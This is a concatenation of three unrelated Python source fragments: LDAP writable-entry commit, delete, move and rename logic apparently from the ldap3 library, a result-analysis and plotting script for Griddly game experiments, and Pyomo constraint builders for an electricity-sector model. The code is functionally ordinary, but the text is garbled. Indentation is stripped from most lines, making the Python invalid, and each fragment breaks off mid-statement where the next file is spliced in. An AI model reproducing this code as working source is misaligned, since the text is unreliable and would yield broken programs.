writable_cursor.entries.append(writable_entry)
writable_entry._state.read_time = self.entry_read_time
writable_entry._state.origin = self # reference to the original read-only entry
# checks original entry for custom definitions in AttrDefs
attr_to_add = []
attr_to_remove = []
object_def_to_add = []
object_def_to_remove = []
for attr in writable_entry._state.origin.entry_definition._attributes:
original_attr = writable_entry._state.origin.entry_definition._attributes[attr]
if attr != original_attr.name and (attr not in writable_entry._state.attributes or conf_operational_attribute_prefix + original_attr.name not in writable_entry._state.attributes):
old_attr_def = writable_entry.entry_definition._attributes[original_attr.name]
new_attr_def = AttrDef(original_attr.name,
key=attr,
validate=original_attr.validate,
pre_query=original_attr.pre_query,
post_query=original_attr.post_query,
default=original_attr.default,
dereference_dn=original_attr.dereference_dn,
description=original_attr.description,
mandatory=old_attr_def.mandatory, # keeps value read from schema
single_value=old_attr_def.single_value, # keeps value read from schema
alias=original_attr.other_names)
od = writable_entry.entry_definition
object_def_to_remove.append(old_attr_def)
object_def_to_add.append(new_attr_def)
# updates attribute name in entry attributes
new_attr = WritableAttribute(new_attr_def, writable_entry, writable_cursor)
if original_attr.name in writable_entry._state.attributes:
new_attr.other_names = writable_entry._state.attributes[original_attr.name].other_names
new_attr.raw_values = writable_entry._state.attributes[original_attr.name].raw_values
new_attr.values = writable_entry._state.attributes[original_attr.name].values
new_attr.response = writable_entry._state.attributes[original_attr.name].response
attr_to_add.append((attr, new_attr))
attr_to_remove.append(original_attr.name)
# writable_entry._state.attributes[attr] = new_attr
## writable_entry._state.attributes.set_alias(attr, new_attr.other_names)
# del writable_entry._state.attributes[original_attr.name]
for attr, new_attr in attr_to_add:
writable_entry._state.attributes[attr] = new_attr
for attr in attr_to_remove:
del writable_entry._state.attributes[attr]
for object_def in object_def_to_remove:
o = writable_entry.entry_definition
o -= object_def
for object_def in object_def_to_add:
o = writable_entry.entry_definition
o += object_def
writable_entry._state.set_status(STATUS_WRITABLE)
return writable_entry
class WritableEntry(EntryBase):
def __setitem__(self, key, value):
if value is not Ellipsis: # hack for using implicit operators in writable attributes
self.__setattr__(key, value)
def __setattr__(self, item, value):
conf_attributes_excluded_from_object_def = [v.lower() for v in get_config_parameter('ATTRIBUTES_EXCLUDED_FROM_OBJECT_DEF')]
if item == '_state' and isinstance(value, EntryState):
self.__dict__['_state'] = value
return
if value is not Ellipsis: # hack for using implicit operators in writable attributes
# checks if using an alias
if item in self.entry_cursor.definition._attributes or item.lower() in conf_attributes_excluded_from_object_def:
if item not in self._state.attributes: # setting value to an attribute still without values
new_attribute = WritableAttribute(self.entry_cursor.definition._attributes[item], self, cursor=self.entry_cursor)
self._state.attributes[str(item)] = new_attribute # force item to a string for key in attributes dict
self._state.attributes[item].set(value) # try to add to new_values
else:
error_message = 'attribute \'%s\' not defined' % item
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorAttributeError(error_message)
def __getattr__(self, item):
if isinstance(item, STRING_TYPES):
if item == '_state':
return self.__dict__['_state']
item = ''.join(item.split()).lower()
for attr in self._state.attributes.keys():
if item == attr.lower():
return self._state.attributes[attr]
for attr in self._state.attributes.aliases():
if item == attr.lower():
return self._state.attributes[attr]
            if item in self.entry_definition._attributes: # item is a new attribute to commit, creates the AttrDef and adds it to the attributes to retrieve
self._state.attributes[item] = WritableAttribute(self.entry_definition._attributes[item], self, self.entry_cursor)
self.entry_cursor.attributes.add(item)
return self._state.attributes[item]
error_message = 'attribute \'%s\' not defined' % item
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorAttributeError(error_message)
else:
error_message = 'attribute name must be a string'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorAttributeError(error_message)
@property
def entry_virtual_attributes(self):
return [attr for attr in self.entry_attributes if self[attr].virtual]
def entry_commit_changes(self, refresh=True, controls=None, clear_history=True):
if clear_history:
self.entry_cursor._reset_history()
if self.entry_status == STATUS_READY_FOR_DELETION:
result = self.entry_cursor.connection.delete(self.entry_dn, controls)
if not self.entry_cursor.connection.strategy.sync:
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
dn = self.entry_dn
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # deletes original read-only Entry
cursor = self._state.origin.entry_cursor
self._state.origin.__dict__.clear()
self._state.origin.__dict__['_state'] = EntryState(dn, cursor)
self._state.origin._state.set_status(STATUS_DELETED)
cursor = self.entry_cursor
self.__dict__.clear()
self._state = EntryState(dn, cursor)
self._state.set_status(STATUS_DELETED)
return True
return False
elif self.entry_status == STATUS_READY_FOR_MOVING:
result = self.entry_cursor.connection.modify_dn(self.entry_dn, '+'.join(safe_rdn(self.entry_dn)), new_superior=self._state._to)
if not self.entry_cursor.connection.strategy.sync:
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
self._state.dn = safe_dn('+'.join(safe_rdn(self.entry_dn)) + ',' + self._state._to)
if refresh:
if self.entry_refresh():
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # refresh dn of origin
self._state.origin._state.dn = self.entry_dn
self._state.set_status(STATUS_COMMITTED)
self._state._to = None
return True
return False
elif self.entry_status == STATUS_READY_FOR_RENAMING:
rdn = '+'.join(safe_rdn(self._state._to))
result = self.entry_cursor.connection.modify_dn(self.entry_dn, rdn)
if not self.entry_cursor.connection.strategy.sync:
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
self._state.dn = rdn + ',' + ','.join(to_dn(self.entry_dn)[1:])
if refresh:
if self.entry_refresh():
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # refresh dn of origin
self._state.origin._state.dn = self.entry_dn
self._state.set_status(STATUS_COMMITTED)
self._state._to = None
return True
return False
elif self.entry_status in [STATUS_VIRTUAL, STATUS_MANDATORY_MISSING]:
missing_attributes = []
for attr in self.entry_mandatory_attributes:
if (attr not in self._state.attributes or self._state.attributes[attr].virtual) and attr not in self._changes:
missing_attributes.append('\'' + attr + '\'')
error_message = 'mandatory attributes %s missing in entry %s' % (', '.join(missing_attributes), self.entry_dn)
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
elif self.entry_status == STATUS_PENDING_CHANGES:
if self._changes:
if self.entry_definition._auxiliary_class: # checks if an attribute is from an auxiliary class and adds it to the objectClass attribute if not present
for attr in self._changes:
# checks schema to see if attribute is defined in one of the already present object classes
attr_classes = self.entry_cursor.schema.attribute_types[attr].mandatory_in + self.entry_cursor.schema.attribute_types[attr].optional_in
for object_class in self.objectclass:
if object_class in attr_classes:
break
else: # executed only if the attribute class is not present in the objectClass attribute
# checks if attribute is defined in one of the possible auxiliary classes
for aux_class in self.entry_definition._auxiliary_class:
if aux_class in attr_classes:
if self._state._initial_status == STATUS_VIRTUAL: # entry is new, there must be a pending objectClass MODIFY_REPLACE
self._changes['objectClass'][0][1].append(aux_class)
else:
self.objectclass += aux_class
if self._state._initial_status == STATUS_VIRTUAL:
new_attributes = dict()
for attr in self._changes:
new_attributes[attr] = self._changes[attr][0][1]
result = self.entry_cursor.connection.add(self.entry_dn, None, new_attributes, controls)
else:
result = self.entry_cursor.connection.modify(self.entry_dn, self._changes, controls)
if not self.entry_cursor.connection.strategy.sync: # asynchronous request
response, result, request = self.entry_cursor.connection.get_response(result, get_request=True)
else:
response = self.entry_cursor.connection.response
result = self.entry_cursor.connection.result
request = self.entry_cursor.connection.request
self.entry_cursor._store_operation_in_history(request, result, response)
if result['result'] == RESULT_SUCCESS:
if refresh:
if self.entry_refresh():
if self._state.origin and self.entry_cursor.connection.server == self._state.origin.entry_cursor.connection.server: # updates original read-only entry if present
for attr in self: # adds AttrDefs from writable entry to origin entry definition if some is missing
if attr.key in self.entry_definition._attributes and attr.key not in self._state.origin.entry_definition._attributes:
self._state.origin.entry_cursor.definition.add_attribute(self.entry_cursor.definition._attributes[attr.key]) # adds AttrDef from writable entry to original entry if missing
temp_entry = self._state.origin.entry_cursor._create_entry(self._state.response)
self._state.origin.__dict__.clear()
self._state.origin.__dict__['_state'] = temp_entry._state
for attr in self: # returns the whole attribute object
if not hasattr(attr,'virtual'):
self._state.origin.__dict__[attr.key] = self._state.origin._state.attributes[attr.key]
self._state.origin._state.read_time = self.entry_read_time
else:
self.entry_discard_changes() # if not refreshed remove committed changes
self._state.set_status(STATUS_COMMITTED)
return True
return False
def entry_discard_changes(self):
self._changes.clear()
self._state.set_status(self._state._initial_status)
def entry_delete(self):
if self.entry_status not in [STATUS_WRITABLE, STATUS_COMMITTED, STATUS_READY_FOR_DELETION]:
error_message = 'cannot delete entry, invalid status: ' + self.entry_status
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', error_message, self)
raise LDAPCursorError(error_message)
self._state.set_status(STATUS_READY_FOR_DELETION)
def entry_refresh(self, tries=4, seconds=2):
"""
Refreshes the entry from the LDAP Server
"""
if self.entry_cursor.connection:
if self.entry_cursor.refresh_entry(self, tries, seconds):
return True
return False
def entry_move(self, destination_dn):
        if self.entry_status not in [STATUS_WRITABLE,
<filename>result_handler.py<gh_stars>0
import random
import matplotlib.pyplot as plt
import json
import os
import copy
import numpy as np
from enum import Enum
from itertools import product
import play_back_tool
import action_space_builder
from ptitprince import PtitPrince as pt
from test_group import get_cem_parameters
import video_exporter
from datetime import datetime
import pandas as pd
from create_griddly_env import create_griddly_env
TEST_GROUP_SIZE = 30*4*3
PAPER_WIDTH = (29.7-5)/2.54
PAPER_HEIGHT = (21.0-6)/2.54
DIFF_X_LIM = [-1.0, 1.5]
SCORE_X_LIM = [0.88, 5.5]
class CollectActionType(Enum):
SEPARATE = 0
EMBEDDED = 1
class SubDataSet:
def __init__(self, file_prefix, name, data):
self.file_prefix = file_prefix
self.name = name
self.data = data
class ScoreDifferenceRecorder:
def __init__(self, cem_pairs):
self.max_diff_per_pair = {pair: -1000000 for pair in cem_pairs}
self.runs_with_max_diff = {pair: [] for pair in cem_pairs}
self.min_diff_per_pair = {pair: 1000000 for pair in cem_pairs}
self.runs_with_min_diff = {pair: [] for pair in cem_pairs}
self.cem_pairs = cem_pairs
def update_with_diff(self, diff, cem_pair, run_key1, run_key2):
if diff > self.max_diff_per_pair[cem_pair]:
self.max_diff_per_pair[cem_pair] = diff
self.runs_with_max_diff[cem_pair] = [(run_key2, run_key1)]
elif diff == self.max_diff_per_pair[cem_pair]:
self.runs_with_max_diff[cem_pair].append((run_key2, run_key1))
if diff < self.min_diff_per_pair[cem_pair]:
self.min_diff_per_pair[cem_pair] = diff
self.runs_with_min_diff[cem_pair] = [(run_key2, run_key1)]
elif diff == self.min_diff_per_pair[cem_pair]:
self.runs_with_min_diff[cem_pair].append((run_key2, run_key1))
def make_videos(self, data_set):
full_data = data_set.data
subdir = 'extreme_differences'
cem_names = get_cem_param_names(full_data)
for cem_pair in list(self.cem_pairs):
i = 0
for run_key1, run_key2 in self.runs_with_max_diff[cem_pair]:
self.build_path_and_videos(cem_names, data_set, subdir, cem_pair, run_key1, run_key2, 'max', i)
i += 1
i = 0
for run_key1, run_key2 in self.runs_with_min_diff[cem_pair]:
self.build_path_and_videos(cem_names, data_set, subdir, cem_pair, run_key1, run_key2, 'min', i)
i += 1
def build_path_and_videos(self, cem_names, data_set, subdir, cem_pair, run_key1, run_key2, min_or_max, stepper):
assert(min_or_max in ['max', 'min'])
run1 = data_set.data['game_runs'][run_key1]
run2 = data_set.data['game_runs'][run_key2]
subdir2 = data_set.name
subdir3 = '_'.join(sorted([cem_names[run1['CemParams']], cem_names[run2['CemParams']]]))
max_or_min_diff = str(self.max_diff_per_pair[cem_pair]) if min_or_max == 'max' else str(self.min_diff_per_pair[cem_pair])
file_name1 = '_'.join([max_or_min_diff, cem_names[run1['CemParams']], str(stepper), run_key1])
video_exporter.make_video_from_data(run1, os.path.join(subdir, subdir2, subdir3, min_or_max), file_name1, frames_per_state=20)
file_name2 = '_'.join([max_or_min_diff, cem_names[run2['CemParams']], str(stepper), run_key2])
video_exporter.make_video_from_data(run2, os.path.join(subdir, subdir2, subdir3, min_or_max), file_name2, frames_per_state=20)
def get_result_object():
result_file_name = input('Enter the name of the result file: ')
with open(os.path.join('results', result_file_name), 'r') as result_file:
result_object = json.load(result_file)
return result_object
def select_complete_test_groups(result_obj):
all_game_rules = result_obj['game_rules']
complete_game_rules = []
for game_rule_obj in all_game_rules.values():
test_group_finished = 'game_runs' in game_rule_obj and len(game_rule_obj['game_runs']) == TEST_GROUP_SIZE
action_builder = action_space_builder.CollectorActionSpaceBuilder()
valid_action_set = action_builder.player_set_validation(set(game_rule_obj['PlayerActions']))
if test_group_finished and valid_action_set:
complete_game_rules.append(game_rule_obj)
complete_test_run_keys = []
for game_rule in complete_game_rules:
complete_test_run_keys += game_rule['game_runs'].values()
return build_data_for_selected_runs(result_obj, complete_test_run_keys)
def build_data_for_selected_runs(full_data, run_keys):
filtered_result = {
'cem_params': {},
'map_params': {},
'game_rules': {},
'game_runs': {}
}
for game_run_key in run_keys:
filtered_result['game_runs'][game_run_key] = full_data['game_runs'][game_run_key] #copy.deepcopy(result_obj['game_runs'][game_run_key])
build_top_level_obj(full_data, run_keys, filtered_result, 'game_rules')
build_top_level_obj(full_data, run_keys, filtered_result, 'cem_params')
build_top_level_obj(full_data, run_keys, filtered_result, 'map_params')
return filtered_result
def build_top_level_obj(full_data, run_keys, current_data_obj, top_level_name):
for param_obj_key, param_obj in full_data[top_level_name].items():
if not 'game_runs' in param_obj:
continue
filtered_param_obj = copy.deepcopy(param_obj)
for dict_key, game_run_key in param_obj['game_runs'].items():
if game_run_key not in run_keys:
del filtered_param_obj['game_runs'][dict_key]
if len(filtered_param_obj['game_runs']) > 0:
current_data_obj[top_level_name][param_obj_key] = filtered_param_obj
def select_with_collect_type(full_data, type):
selected_runs = []
for game_rules_obj in full_data['game_rules'].values():
separate_collect = False
if 'collect' in game_rules_obj['PlayerActions'] or 'collect_from_ahead' in game_rules_obj['PlayerActions']:
separate_collect = True
if separate_collect and type is CollectActionType.SEPARATE or not separate_collect and type is CollectActionType.EMBEDDED:
selected_runs += [game_run_key for game_run_key in game_rules_obj['game_runs'].values()]
return selected_runs
def select_with_map_size(full_data, map_width, map_height):
selected_runs = []
for map_params in full_data['map_params'].values():
if map_params['Height'] == map_height and map_params['Width'] == map_width:
selected_runs += [game_run_key for game_run_key in map_params['game_runs'].values()]
return selected_runs
def select_with_run_score(full_data, min_score, max_score):
selected_runs = []
for game_run_key, game_run_obj in full_data['game_runs'].items():
if game_run_obj['Score'][0] >= min_score and game_run_obj['Score'][0] <= max_score:
selected_runs.append(game_run_key)
return selected_runs
def plot_difference_histograms(data_set, save_folder, make_max_min_videos=False):
figure, axs = plt.subplots(3, 1)
figure.set_tight_layout(True)
data = data_set.data
test_batches = group_runs_by_params(data, ['GriddlyDescription', 'GameRules', 'Map'], return_keys=True)
score_diffs_per_pair = extract_score_diffs_per_pair(data_set, test_batches, make_max_min_videos)
emp_param_names = get_cem_param_names(data)
pair_order = [
'Supportive-Antagonistic',
'Random-Antagonistic',
'Random-Supportive'
]
for pair, diffs in score_diffs_per_pair.items():
pair_name = emp_param_names[pair[1]] + '-' + emp_param_names[pair[0]]
print(pair_name, 'Mean difference:', np.mean(diffs))
sub_plot_idx = pair_order.index(pair_name)
axs[sub_plot_idx].hist(diffs, bins=16, range=(-8.5, 7.5), linewidth=0.5, edgecolor='white')
axs[sub_plot_idx].set_title(data_set.name + ', ' + emp_param_names[pair[1]] + '-' + emp_param_names[pair[0]])
if sub_plot_idx == len(pair_order) - 1:
axs[sub_plot_idx].set_xlabel('Score difference between CEM-parametrizations')
axs[sub_plot_idx].set_ylabel('Number of pairs')
figure.set_size_inches(PAPER_WIDTH/3, PAPER_HEIGHT)
if save_folder:
figure.savefig(os.path.join(save_folder, data_set.file_prefix + 'diff_histograms.svg'))
plt.close()
else:
plt.show()
def extract_score_diffs_per_pair(data_set, test_batches, make_max_min_videos=False):
full_data = data_set.data
cem_pairs = get_cem_param_pairs(full_data)
score_diffs_per_pair = {pair: [] for pair in cem_pairs}
diff_recorder = ScoreDifferenceRecorder(cem_pairs)
for test_batch in test_batches.values():
for run1_idx in range(len(test_batch)):
for run2_idx in range(run1_idx + 1, len(test_batch)):
run_key1 = test_batch[run1_idx]
run_key2 = test_batch[run2_idx]
run1 = full_data['game_runs'][run_key1]
run2 = full_data['game_runs'][run_key2]
if run1 == run2:
continue
cem_pair = tuple(sorted([run1['CemParams'], run2['CemParams']]))
diff = run2['Score'][0] - run1['Score'][0]
# Make sure the diff is "cem_pair_1"-"cem_pair_0" and not "cem_pair_0"-"cem_pair_1"
if run2['CemParams'] == cem_pair[0]:
diff = -diff
score_diffs_per_pair[cem_pair].append(diff)
diff_recorder.update_with_diff(diff, cem_pair, run_key1, run_key2)
if make_max_min_videos:
diff_recorder.make_videos(data_set)
return score_diffs_per_pair
def plot_run_score_raincloud(data_set, save_folder):
data = data_set.data
figure, ax = plt.subplots()
cem_order = ['Supportive', 'Random', 'Antagonistic']
cem_names = get_cem_param_names(data)
data_frame = prepare_raincloud_data(data, cem_names)
ax = pt.RainCloud(x='cem_param', y='action_set_mean', data=data_frame, ax=ax, order=cem_order, orient='h', palette='Set2')
ax.set_title('Mean scores of test groups\n' + data_set.name)
ax.xaxis.grid(visible=True)
ax.set_xlim(SCORE_X_LIM)
figure.set_size_inches(PAPER_WIDTH/2, PAPER_HEIGHT)
figure.set_tight_layout(True)
if save_folder:
figure.savefig(os.path.join(save_folder, data_set.file_prefix + 'avg_score_raincloud.svg'))
plt.close()
else:
plt.show()
def plot_run_score_matrix(full_data, save_folder):
figure, axs = plt.subplots(1, len(full_data['map_params']))
cem_order = ['Supportive', 'Random', 'Antagonistic']
runs_per_map = group_runs_by_params(full_data, ['MapParams'], return_keys=True)
map_names = get_map_param_names(full_data)
map_key_i = 0
cem_names = get_cem_param_names(full_data)
for map_param_key, runs in runs_per_map.items():
data = build_data_for_selected_runs(full_data, runs)
data_frame = prepare_raincloud_data(data, cem_names)
axs[map_key_i] = pt.RainCloud(x='cem_param', y='action_set_mean', data=data_frame, palette='Set2', ax=axs[map_key_i], orient='h', order=cem_order, bw=0.2)
axs[map_key_i].set_title('Map param: ' + map_names[map_param_key[0]], fontsize=10)
axs[map_key_i].xaxis.grid(visible=True)
axs[map_key_i].yaxis.set_visible(map_key_i == 0)
axs[map_key_i].set_xlim(SCORE_X_LIM)
map_key_i += 1
figure.set_size_inches(PAPER_WIDTH, PAPER_HEIGHT)
figure.set_tight_layout(True)
if save_folder:
figure.savefig(os.path.join(save_folder, 'avg_result_matrix.svg'))
plt.close()
else:
plt.show()
def prepare_raincloud_data(data, cem_names):
groups_to_average = group_runs_by_params(data, ['CemParams', 'GameRules', 'MapParams'])
avg_scores_per_group = {group_key: np.mean([run['Score'] for run in group_runs]) for group_key, group_runs in groups_to_average.items()}
df_data = []
for group_key, avg_score in avg_scores_per_group.items():
cem_name = cem_names[group_key[0]]
df_data.append((cem_name, avg_score))
return pd.DataFrame.from_records(df_data, columns=['cem_param', 'action_set_mean'])
def plot_avg_diff_rainclouds(data_set, save_folder):
def make_cem_param_name(cem_param_names, pair):
short_names = {
'Supportive': 'sup',
'Antagonistic': 'ant',
'Random': 'rnd'
}
return short_names[cem_param_names[pair[1]]] + '-' + short_names[cem_param_names[pair[0]]]
def print_outliers(title, lo_outliers, hi_outliers):
print('Outliers for pair', title)
print('Low outliers:')
for lo_outlier in lo_outliers:
print('GameRules:', lo_outlier[0][0], 'MapParams:', lo_outlier[0][2], 'Value:', lo_outlier[1])
print('High outliers:')
for hi_outlier in hi_outliers:
print('GameRules:', hi_outlier[0][0], 'MapParams:', hi_outlier[0][2], 'Value:', hi_outlier[1])
figure, axs = plt.subplots()
data = data_set.data
cem_param_pairs = get_cem_param_pairs(data)
avg_list_per_cem_pair = {pair: [] for pair in cem_param_pairs}
game_variant_batches = group_runs_by_params(data, ['GameRules', 'GriddlyDescription', 'MapParams'])
for game_variant_key, game_variant_batch in game_variant_batches.items():
variant_runs_per_cem = {cem_param: [] for cem_param in data['cem_params'].keys()}
for game_run in game_variant_batch:
variant_runs_per_cem[game_run['CemParams']].append(game_run)
avg_score_per_cem = {}
for cem_param, runs in variant_runs_per_cem.items():
avg_score = np.mean([run['Score'] for run in runs])
avg_score_per_cem[cem_param] = avg_score
for pair in cem_param_pairs:
avg_diff = avg_score_per_cem[pair[1]] - avg_score_per_cem[pair[0]]
avg_list_per_cem_pair[pair].append((game_variant_key, avg_diff))
cem_param_names = get_cem_param_names(data)
pd_ready_data = []
for pair, data_points in avg_list_per_cem_pair.items():
cem_pair_name = make_cem_param_name(cem_param_names, pair)
low_outliers, hi_outliers = find_outliers(data_points)
print_outliers(cem_pair_name, low_outliers, hi_outliers)
pd_ready_data += [(cem_pair_name, data_point[1]) for data_point in data_points]
data_frame = pd.DataFrame.from_records(pd_ready_data, columns=['cem_pair', 'score_diff_avg'])
axs = pt.RainCloud(x='cem_pair', y='score_diff_avg', data=data_frame, palette='Set1', ax=axs, order=['sup-ant', 'rnd-ant', 'rnd-sup'], orient='h', bw=0.2)
axs.xaxis.grid(visible=True)
axs.set_xlim(DIFF_X_LIM)
axs.set_title('Mean score differences\n' + data_set.name)
figure.set_size_inches(PAPER_WIDTH/2, PAPER_HEIGHT)
figure.set_tight_layout(True)
if save_folder:
figure.savefig(os.path.join(save_folder, data_set.file_prefix+'avg_diff_raincloud.svg'))
plt.close()
else:
plt.show()
def find_outliers(data_keys_and_values, outlier_const=1.5):
data_arr = np.array([pair[1] for pair in data_keys_and_values])
upper_quartile = np.percentile(data_arr, 75)
lower_quartile = np.percentile(data_arr, 25)
iqr = (upper_quartile - lower_quartile) * outlier_const
outlier_bounds = (lower_quartile - iqr, upper_quartile + iqr)
low_outliers = []
high_outliers = []
for data_key, data_val in data_keys_and_values:
if data_val < outlier_bounds[0]:
low_outliers.append((data_key, data_val))
elif data_val > outlier_bounds[1]:
high_outliers.append((data_key, data_val))
return low_outliers, high_outliers
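# Worked example (hypothetical numbers, not taken from any result file): for
# [('a', v) for v in [1, 2, 3, 4, 5, 6, 7, 8, 9, 100]] numpy's default linear
# interpolation gives Q1 = 3.25 and Q3 = 7.75, so with outlier_const = 1.5 the
# bounds are (3.25 - 6.75, 7.75 + 6.75) = (-3.5, 14.5); find_outliers then
# returns an empty low-outlier list and [('a', 100)] as the only high outlier.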
def plot_all_action_frequencies(data_set, save_folder):
def get_action_name(env_, action):
return 'idle' if action[1] == 0 else env_.action_names[action[0]]
data = data_set.data
env = create_griddly_env('collector_game.yaml')
env.reset()
cem_name_lookup = get_cem_param_names(data)
labels = []
cem_keys = list(data['cem_params'])
cem_names = [cem_name_lookup[key] for key in cem_keys]
data_per_agent = []
for agent_i in range(env.player_count):
data_per_agent.append([[] for _ in cem_keys])
for game_run in data['game_runs'].values():
agent_in_turn = 0
cem_key = game_run['CemParams']
cem_idx = cem_keys.index(cem_key)
for full_action in game_run['Actions']:
agent_action = full_action[agent_in_turn]
action_name = get_action_name(env, agent_action)
if action_name not in labels:
labels.append(action_name)
for agent_i in range(env.player_count):
for data_list in data_per_agent[agent_i]:
data_list.append(0)
action_name_idx = labels.index(action_name)
data_per_agent[agent_in_turn][cem_idx][action_name_idx] += 1
agent_in_turn = (agent_in_turn + 1) % env.player_count
for agent_i in range(len(data_per_agent)):
for cem_i in range(len(data_per_agent[agent_i])):
sorted_by_labels = [sorted_data for _, sorted_data in sorted(zip(labels, data_per_agent[agent_i][cem_i]), key=lambda x: x[0])]
data_per_agent[agent_i][cem_i] = sorted_by_labels
labels.sort()
fig, ax = plot_grouped_bars('Frequency of Player actions with different CEM-parametrizations\n'+data_set.name+', linear scale', labels, data_per_agent[0], cem_names)
if save_folder:
fig.savefig(os.path.join(save_folder, data_set.file_prefix + 'plr_action_freq.svg'))
plt.close()
else:
plt.show()
fig, ax = plot_grouped_bars('Frequency of Player actions with different CEM-parametrizations\n'+data_set.name+', logarithmic scale', labels, data_per_agent[0], cem_names, 'log')
if save_folder:
fig.savefig(os.path.join(save_folder, data_set.file_prefix + 'plr_action_freq_log.svg'))
plt.close()
else:
plt.show()
    fig, ax = plot_grouped_bars('Frequency of NPC actions with different CEM-parametrizations\n'+data_set.name+', linear scale',
<filename>scripts/md_CE_formula.py
#
# General Electricity sector Decarbonization Model (GEDM)
# Copyright (C) 2020 <NAME>.
# Licensed under the MIT License (see LICENSE file).
#
# Module note:
# Functions to construct CE model constraints
#
import pyomo.environ as pe
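# Illustrative sketch (not part of GEDM): every constraint builder below uses
# the same idiom -- define a local rule function, then attach it to the model
# with setattr(model, name, pe.Constraint(index_sets, rule=rule)). The toy
# model here shows that idiom in isolation; all names and numbers are
# hypothetical.
def _example_rule_constraint_idiom():
    model = pe.ConcreteModel()
    model.setUnit = pe.Set(initialize=['U1', 'U2'])
    model.pCap = pe.Param(model.setUnit, initialize={'U1': 100.0, 'U2': 50.0})
    model.pEAF = pe.Param(model.setUnit, initialize={'U1': 0.9, 'U2': 0.8})
    model.vPwOut = pe.Var(model.setUnit, within=pe.NonNegativeReals)
    def ruleMaxOutput(model, sUnit):
        # output cannot exceed capacity scaled by the availability factor
        return model.vPwOut[sUnit] <= model.pCap[sUnit] * model.pEAF[sUnit]
    setattr(model, 'conMaxOutput', pe.Constraint(model.setUnit, rule=ruleMaxOutput))
    return model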
##### ---- dispatchable ----------------------------------------------- #####
def constUnitGen_Exist(model, objMarket):
''' generation constraints of existing dispatchable process '''
### gross power output of existing dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vExProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
<= model.pExProcDispCap_TCD[sProcDisp] * model.pExProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGross_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of existing dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vExProcDispPwOutNet_TCD_TS[sProcDisp, sTimeSlice] \
== model.vExProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pExProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNet_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutNet_Disp))
return
def constUnitGen_New(model, objMarket):
''' generation constraints of new dispatchable process '''
### gross power output of new candidate dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vNewProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
<= model.vNewProcDispCap_TCD[sProcDisp] * model.pNewProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGrossNew_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of new candidate dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vNewProcDispPwOutNet_TCD_TS[sProcDisp, sTimeSlice] \
== model.vNewProcDispPwOutGrs_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pNewProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNetNew_TCD_TS", pe.Constraint(model.setProcNewDisp_TCD, \
model.setTimeSlice_TS, rule = ruleProcessPowerOutNet_Disp))
return
##### ---- dispatchable (testing TS) ----------------------------------------------- #####
def constUnitGen_Exist_RT(model, objMarket):
''' generation constraints of existing dispatchable process on testing TS '''
### gross power output of existing dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vExProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
<= model.pExProcDispCap_TCD[sProcDisp] * model.pExProcDispEAF_TCD[sProcDisp]
setattr(model, "conProcDispPwOutGrossTest_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutGross_Disp))
### net power output of existing dispatchable units
def ruleProcessPowerOutNet_Disp(model, sProcDisp, sTimeSlice) :
return model.vExProcDispPwOutNetTest_TCD_TS[sProcDisp, sTimeSlice] \
== model.vExProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
* (1-model.pExProcDispOUS_TCD[sProcDisp])
setattr(model, "conProcDispPwOutNetTest_TCD_TS", pe.Constraint(model.setProcBaseDisp_TCD, \
model.setTSRT_TS, rule = ruleProcessPowerOutNet_Disp))
return
def constUnitGen_New_RT(model, objMarket):
''' generation constraints of new dispatchable process on testing TS '''
### gross power output of new candidate dispatchable units
def ruleProcessPowerOutGross_Disp(model, sProcDisp, sTimeSlice) :
# consider overall planned/forced outage, equivalent available factor
return model.vNewProcDispPwOutGrsTest_TCD_TS[sProcDisp, sTimeSlice] \
